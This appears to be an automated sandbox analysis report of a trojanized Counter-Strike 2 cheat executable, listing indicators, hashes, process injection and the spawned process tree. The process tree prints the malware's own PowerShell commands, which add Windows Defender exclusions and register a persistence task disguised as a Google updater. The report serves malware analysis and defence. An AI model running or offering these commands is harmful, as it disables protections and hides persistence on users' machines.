Analysis
max time kernel: 32s
max time network: 41s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 09/06/2024, 07:34
Static task: static1
Behavioral task: behavioral1
Sample: cs2.exe
Resource: win10-20240404-en
General
Target: cs2.exe
Size: 5.9MB
MD5: e9211ee72f3b6b14423579889d7a8319
SHA1: f207d89647f7ce6311e2237a24185d45ce744d88
SHA256: 4a43e95020312d2bc4725f469e6ba1fa66d164842584b916f24606350ab728f6
SHA512: 1bf7366b2c56399f29452961dbd6b8af75ed668570f210c8f819ecd6126f7ee9e6bb8b5329436916b65417b9f20787f59c24e96fc07eb6ffb3fd3be20527b352
SSDEEP: 98304:qgvNWGPzIo6XlhrXIHbr+61Q6JYAUGZKvrvXZu4Jc0LMAOWF+UicMjS0/Oo25RHH:qgvNW+Slir+IQ6JBULv7ZZrLnOW4b2nf
Malware Config
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
description            pid   Process        procid_target
PID 2948 created 3396  2948  conhost32.exe  54
PID 2948 created 3396  2948  conhost32.exe  54
PID 2948 created 3396  2948  conhost32.exe  54
PID 2948 created 3396  2948  conhost32.exe  54
PID 3156 created 3396  3156  updater.exe    54
PID 3156 created 3396  3156  updater.exe    54
PID 3156 created 3396  3156  updater.exe    54
Command and Scripting Interpreter: PowerShell
pid   Process
804   powershell.exe
4432  powershell.exe
2132  powershell.exe
Executes dropped EXE 3 IoCs
pid   Process
2948  conhost32.exe
4168  cs2-external-esp.exe
3156  updater.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow  ioc
28    pastebin.com
18    raw.githubusercontent.com
19    raw.githubusercontent.com
27    pastebin.com
Drops file in System32 directory 1 IoCs
description                   ioc                                                   Process
File opened for modification  C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC  svchost.exe
Suspicious use of SetThreadContext 2 IoCs
description                          pid   Process        procid_target
PID 2948 set thread context of 3456  2948  conhost32.exe  80
PID 3156 set thread context of 4900  3156  updater.exe    89
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid   Process
804   powershell.exe
804   powershell.exe
804   powershell.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
2948  conhost32.exe
2948  conhost32.exe
4432  powershell.exe
4432  powershell.exe
4432  powershell.exe
2948  conhost32.exe
2948  conhost32.exe
2948  conhost32.exe
2948  conhost32.exe
3456  dialer.exe
3456  dialer.exe
5108  powershell.exe
5108  powershell.exe
3456  dialer.exe
3456  dialer.exe
5108  powershell.exe
4168  cs2-external-esp.exe
4168  cs2-external-esp.exe
3456  dialer.exe
3456  dialer.exe
3456  dialer.exe
3456  dialer.exe
3456  dialer.exe
5108  powershell.exe
3456  dialer.exe
3456  dialer.exe
3456  dialer.exe
3456  dialer.exe
2948  conhost32.exe
2948  conhost32.exe
3456  dialer.exe
3456  dialer.exe
3456  dialer.exe
3456  dialer.exe
3456  dialer.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description                           pid   Process
Token: SeDebugPrivilege               804   powershell.exe
Token: SeDebugPrivilege               4432  powershell.exe
Token: SeIncreaseQuotaPrivilege       4432  powershell.exe
Token: SeSecurityPrivilege            4432  powershell.exe
Token: SeTakeOwnershipPrivilege       4432  powershell.exe
Token: SeLoadDriverPrivilege          4432  powershell.exe
Token: SeSystemProfilePrivilege       4432  powershell.exe
Token: SeSystemtimePrivilege          4432  powershell.exe
Token: SeProfSingleProcessPrivilege   4432  powershell.exe
Token: SeIncBasePriorityPrivilege     4432  powershell.exe
Token: SeCreatePagefilePrivilege      4432  powershell.exe
Token: SeBackupPrivilege              4432  powershell.exe
Token: SeRestorePrivilege             4432  powershell.exe
Token: SeShutdownPrivilege            4432  powershell.exe
Token: SeDebugPrivilege               4432  powershell.exe
Token: SeSystemEnvironmentPrivilege   4432  powershell.exe
Token: SeRemoteShutdownPrivilege      4432  powershell.exe
Token: SeUndockPrivilege              4432  powershell.exe
Token: SeManageVolumePrivilege        4432  powershell.exe
Token: 33                             4432  powershell.exe
Token: 34                             4432  powershell.exe
Token: 35                             4432  powershell.exe
Token: 36                             4432  powershell.exe
Token: SeDebugPrivilege               3456  dialer.exe
Token: SeDebugPrivilege               5108  powershell.exe
Token: SeIncreaseQuotaPrivilege       5108  powershell.exe
Token: SeSecurityPrivilege            5108  powershell.exe
Token: SeTakeOwnershipPrivilege       5108  powershell.exe
Token: SeLoadDriverPrivilege          5108  powershell.exe
Token: SeSystemProfilePrivilege       5108  powershell.exe
Token: SeSystemtimePrivilege          5108  powershell.exe
Token: SeProfSingleProcessPrivilege   5108  powershell.exe
Token: SeIncBasePriorityPrivilege     5108  powershell.exe
Token: SeCreatePagefilePrivilege      5108  powershell.exe
Token: SeBackupPrivilege              5108  powershell.exe
Token: SeRestorePrivilege             5108  powershell.exe
Token: SeShutdownPrivilege            5108  powershell.exe
Token: SeDebugPrivilege               5108  powershell.exe
Token: SeSystemEnvironmentPrivilege   5108  powershell.exe
Token: SeRemoteShutdownPrivilege      5108  powershell.exe
Token: SeUndockPrivilege              5108  powershell.exe
Token: SeManageVolumePrivilege        5108  powershell.exe
Token: 33                             5108  powershell.exe
Token: 34                             5108  powershell.exe
Token: 35                             5108  powershell.exe
Token: 36                             5108  powershell.exe
Token: SeAssignPrimaryTokenPrivilege  2168  svchost.exe
Token: SeIncreaseQuotaPrivilege       2168  svchost.exe
Token: SeSecurityPrivilege            2168  svchost.exe
Token: SeTakeOwnershipPrivilege       2168  svchost.exe
Token: SeLoadDriverPrivilege          2168  svchost.exe
Token: SeSystemtimePrivilege          2168  svchost.exe
Token: SeBackupPrivilege              2168  svchost.exe
Token: SeRestorePrivilege             2168  svchost.exe
Token: SeShutdownPrivilege            2168  svchost.exe
Token: SeSystemEnvironmentPrivilege   2168  svchost.exe
Token: SeUndockPrivilege              2168  svchost.exe
Token: SeManageVolumePrivilege        2168  svchost.exe
Token: SeAssignPrimaryTokenPrivilege  2168  svchost.exe
Token: SeIncreaseQuotaPrivilege       2168  svchost.exe
Token: SeSecurityPrivilege            2168  svchost.exe
Token: SeTakeOwnershipPrivilege       2168  svchost.exe
Token: SeLoadDriverPrivilege          2168  svchost.exe
Token: SeSystemtimePrivilege          2168  svchost.exe
Suspicious use of WriteProcessMemory 64 IoCs
description                        pid   Process        procid_target
PID 4236 wrote to memory of 804    4236  cs2.exe        72
PID 4236 wrote to memory of 804    4236  cs2.exe        72
PID 4236 wrote to memory of 804    4236  cs2.exe        72
PID 4236 wrote to memory of 2948   4236  cs2.exe        74
PID 4236 wrote to memory of 2948   4236  cs2.exe        74
PID 4236 wrote to memory of 4168   4236  cs2.exe        75
PID 4236 wrote to memory of 4168   4236  cs2.exe        75
PID 2948 wrote to memory of 3456   2948  conhost32.exe  80
PID 3456 wrote to memory of 584    3456  dialer.exe     5
PID 3456 wrote to memory of 640    3456  dialer.exe     7
PID 3456 wrote to memory of 736    3456  dialer.exe     10
PID 3456 wrote to memory of 908    3456  dialer.exe     13
PID 3456 wrote to memory of 1008   3456  dialer.exe     14
PID 3456 wrote to memory of 440    3456  dialer.exe     15
PID 3456 wrote to memory of 380    3456  dialer.exe     16
PID 3456 wrote to memory of 592    3456  dialer.exe     17
PID 3456 wrote to memory of 1092   3456  dialer.exe     19
PID 3456 wrote to memory of 1104   3456  dialer.exe     20
PID 3456 wrote to memory of 1204   3456  dialer.exe     21
PID 3456 wrote to memory of 1224   3456  dialer.exe     22
PID 3456 wrote to memory of 1240   3456  dialer.exe     23
PID 3456 wrote to memory of 1248   3456  dialer.exe     24
PID 3456 wrote to memory of 1408   3456  dialer.exe     25
PID 3456 wrote to memory of 1432   3456  dialer.exe     26
PID 3456 wrote to memory of 1456   3456  dialer.exe     27
PID 3456 wrote to memory of 1512   3456  dialer.exe     28
PID 3456 wrote to memory of 1560   3456  dialer.exe     29
PID 3456 wrote to memory of 1608   3456  dialer.exe     30
PID 3456 wrote to memory of 1640   3456  dialer.exe     31
PID 3456 wrote to memory of 1756   3456  dialer.exe     32
PID 3456 wrote to memory of 1764   3456  dialer.exe     33
PID 3456 wrote to memory of 1776   3456  dialer.exe     34
PID 3456 wrote to memory of 1816   3456  dialer.exe     35
PID 3456 wrote to memory of 1876   3456  dialer.exe     36
PID 3456 wrote to memory of 2012   3456  dialer.exe     37
PID 3456 wrote to memory of 1900   3456  dialer.exe     38
PID 3456 wrote to memory of 2168   3456  dialer.exe     39
PID 3456 wrote to memory of 2272   3456  dialer.exe     40
PID 3456 wrote to memory of 2504   3456  dialer.exe     41
PID 3456 wrote to memory of 2512   3456  dialer.exe     42
PID 3456 wrote to memory of 2620   3456  dialer.exe     43
PID 3456 wrote to memory of 2640   3456  dialer.exe     44
PID 3456 wrote to memory of 2652   3456  dialer.exe     45
PID 3456 wrote to memory of 2660   3456  dialer.exe     46
PID 3456 wrote to memory of 2708   3456  dialer.exe     47
PID 3456 wrote to memory of 2780   3456  dialer.exe     48
PID 3456 wrote to memory of 2788   3456  dialer.exe     49
PID 3456 wrote to memory of 2836   3456  dialer.exe     50
PID 3456 wrote to memory of 2884   3456  dialer.exe     51
PID 3456 wrote to memory of 3092   3456  dialer.exe     52
PID 3456 wrote to memory of 3112   3456  dialer.exe     53
PID 3456 wrote to memory of 3396   3456  dialer.exe     54
PID 3456 wrote to memory of 3944   3456  dialer.exe     57
PID 3456 wrote to memory of 3796   3456  dialer.exe     58
PID 3456 wrote to memory of 4964   3456  dialer.exe     60
PID 3456 wrote to memory of 1004   3456  dialer.exe     62
PID 3456 wrote to memory of 4296   3456  dialer.exe     63
PID 3456 wrote to memory of 3596   3456  dialer.exe     64
PID 3456 wrote to memory of 2100   3456  dialer.exe     65
PID 3456 wrote to memory of 1352   3456  dialer.exe     66
PID 3456 wrote to memory of 3892   3456  dialer.exe     67
PID 3456 wrote to memory of 436    3456  dialer.exe     68
PID 3456 wrote to memory of 4040   3456  dialer.exe     69
PID 3456 wrote to memory of 2948   3456  dialer.exe     74
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
(process tree; indentation shows parent/child nesting, signature hits listed under each process)
PID 584 | C:\Windows\system32\winlogon.exe | cmdline: winlogon.exe
    PID 1008 | C:\Windows\system32\dwm.exe | cmdline: "dwm.exe"
PID 640 | C:\Windows\system32\lsass.exe | cmdline: C:\Windows\system32\lsass.exe
PID 736 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
PID 908 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
PID 440 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
PID 380 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
PID 592 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
PID 1092 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    - Drops file in System32 directory
    PID 2620 | c:\windows\system32\taskhostw.exe | cmdline: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    PID 3156 | C:\Users\Admin\Google\Chrome\updater.exe | cmdline: C:\Users\Admin\Google\Chrome\updater.exe
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
PID 1104 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
PID 1204 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k localservice -s nsi
PID 1224 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
PID 1240 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k localservice -s EventSystem
PID 1248 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k netsvcs -s Themes
PID 1408 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
PID 1432 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k netsvcs -s SENS
PID 1456 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    PID 2512 | c:\windows\system32\sihost.exe | cmdline: sihost.exe
PID 1512 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
PID 1560 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
PID 1608 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k networkservice -s Dnscache
PID 1640 | C:\Windows\System32\svchost.exe | cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
PID 1756 | C:\Windows\System32\svchost.exe | cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
PID 1764 | C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
PID 1776 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k appmodel -s StateRepository
PID 1816 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k localservice -s netprofm
PID 1876 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
PID 2012 | C:\Windows\System32\spoolsv.exe | cmdline: C:\Windows\System32\spoolsv.exe
PID 1900 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
PID 2168 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    - Suspicious use of AdjustPrivilegeToken
PID 2272 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
PID 2504 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
PID 2640 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
PID 2652 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
PID 2660 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
PID 2708 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
PID 2780 | C:\Windows\sysmon.exe | cmdline: C:\Windows\sysmon.exe
PID 2788 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
PID 2836 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k netsvcs -s WpnService
PID 2884 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
PID 3092 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k netsvcs -s Browser
PID 3112 | C:\Windows\system32\wbem\unsecapp.exe | cmdline: C:\Windows\system32\wbem\unsecapp.exe -Embedding
PID 3396 | C:\Windows\Explorer.EXE | cmdline: C:\Windows\Explorer.EXE
    PID 4236 | C:\Users\Admin\AppData\Local\Temp\cs2.exe | cmdline: "C:\Users\Admin\AppData\Local\Temp\cs2.exe"
        - Suspicious use of WriteProcessMemory
        PID 804 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAaQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbQBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAdgBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAZwBiACMAPgA="
            decoded -EncodedCommand (UTF-16LE base64; decoding added here, not part of the sandbox output): <#kiq#>Add-MpPreference <#zmb#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#kvc#> -Force <#zgb#>
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        PID 2948 | C:\Users\Admin\AppData\Local\conhost32.exe | cmdline: "C:\Users\Admin\AppData\Local\conhost32.exe"
            - Suspicious use of NtCreateUserProcessOtherParentProcess
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory
        PID 4168 | C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe | cmdline: "C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            PID 3196 | C:\Windows\System32\Conhost.exe | cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    PID 4432 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    PID 3456 | C:\Windows\System32\dialer.exe | cmdline: C:\Windows\System32\dialer.exe
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
    PID 5108 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jdikcdmvr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID 316 | C:\Windows\System32\Conhost.exe | cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    PID 2380 | C:\Windows\System32\schtasks.exe | cmdline: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        PID 3384 | C:\Windows\System32\Conhost.exe | cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    PID 2132 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        - Command and Scripting Interpreter: PowerShell
    PID 4900 | C:\Windows\System32\dialer.exe | cmdline: C:\Windows\System32\dialer.exe
    PID 4376 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jdikcdmvr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
        PID 1524 | C:\Windows\System32\Conhost.exe | cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    PID 3128 | C:\Windows\System32\dialer.exe | cmdline: C:\Windows\System32\dialer.exe
    PID 4912 | C:\Windows\System32\dialer.exe | cmdline: C:\Windows\System32\dialer.exe
PID 3944 | C:\Windows\System32\RuntimeBroker.exe | cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
PID 3796 | C:\Windows\system32\DllHost.exe | cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
PID 4964 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k localservice -s CDPSvc
PID 1004 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
PID 4296 | C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
PID 3596 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | cmdline: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
PID 2100 | c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
PID 1352 | C:\Windows\system32\DllHost.exe | cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
PID 3892 | C:\Windows\system32\ApplicationFrameHost.exe | cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding
PID 436 | C:\Windows\System32\InstallAgent.exe | cmdline: C:\Windows\System32\InstallAgent.exe -Embedding
PID 4040 | C:\Windows\system32\DllHost.exe | cmdline: C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 3KB
MD5: 8592ba100a78835a6b94d5949e13dfc1
SHA1: 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256: fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512: 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Filesize: 18KB
MD5: 84b947076ff79194bd2f2539c80d2fac
SHA1: 154b54aa34a1521d59d373bae20197426707d285
SHA256: 858af83202a048447e425f4d815fd8faadbe060aa0777c0c1743f577f7b9ff92
SHA512: dd42a4187f5e806690aeb2f49734da7199e09f92f07125dd9b26aa2da2b8bb3b74db2b2fe3d2a83f75ab900731a1a1bc808923df80b1e239cd43b841499f701f

Filesize: 1KB
MD5: 4e36cd1fa1e00c532cb82880a8a6097d
SHA1: 2d5a84ef221b0d5637fb854f68eef69d36065c15
SHA256: f55e8fb411153ce462b5e7cbe4c2e362bb4a73dcaff6e2905aea6eab5a4fb8ca
SHA512: 4910cec0f2ea8c9b1490fa1d95369d97bf8ff80840454ecea0ed50d9427a421fdb5bc914c86a05f92574211a4c7a3f429acbfd950c6d8411ef6fa31fabd2a2e6

Filesize: 1KB
MD5: 1d2d913c3dc74c96a90c5f53810a4258
SHA1: 2ec54878f305c68ff23a03c612563267704db95e
SHA256: 54d6b3b1c9dc258b5ffcdb51148e5c31131d5824d8ce43b78998c3a812b965e9
SHA512: 8a93c9b24aad835b7a10d8b511b5a8c07f19bcc426b1c15f1b5643822ccc1bdd045e2ea8fd3e5094c00320b9fe45b3cc70700e155992aaca4093c81e349e6853

Filesize: 1KB
MD5: bbb673277fae96ee4bc299672085e949
SHA1: 731ccb1581a06bff2ca36ca46b20c91c9adc468c
SHA256: 21a0a3c47eb15cec5d37688a67369836fda0164d0cd5afaa9a2aa52fb838685d
SHA512: aa0efc1683991ed68027f0fbd1dfcf0616dd0c328bd015cb43987411e454e0583e8cc1a45bc9f689e873007071e0923d9be10a6db689ba268a167f856b6a8425

Filesize: 1B
MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Filesize: 190KB
MD5: dfae04e92d343bd110609b8194816131
SHA1: d1b1f02cb02273f56eef010a52072f6c6a23f071
SHA256: 807999620cb4783d5c8f282cc21a6c5829e9f99719cbcdb7a71bdacd58671daa
SHA512: 6083ae949fef7c09102ac2d1fd6da30ec38b6044a9fe258a64ec07178cf5a180158a0fda32f76b76d14cff6653a8a17f8a5f15c747625be4a42fe015f48dc2fe

Filesize: 5.7MB
MD5: 0ca285f9a8c43016ffe109a13b0e07a0
SHA1: a03f79912ab0fbfd10ee3ff67bff60671a8ad42f
SHA256: 880123a7fac24705ffb6795713d32fdc21679ac00802e72cb54d86814be4fcf1
SHA512: b68ee3e6b8499ca4995390d8c614784d13629a326bbac0c9d258813723428cbd830021e68bd78f7ca7d8330c0eeb1b28405f29bb967349a205c98973086ef883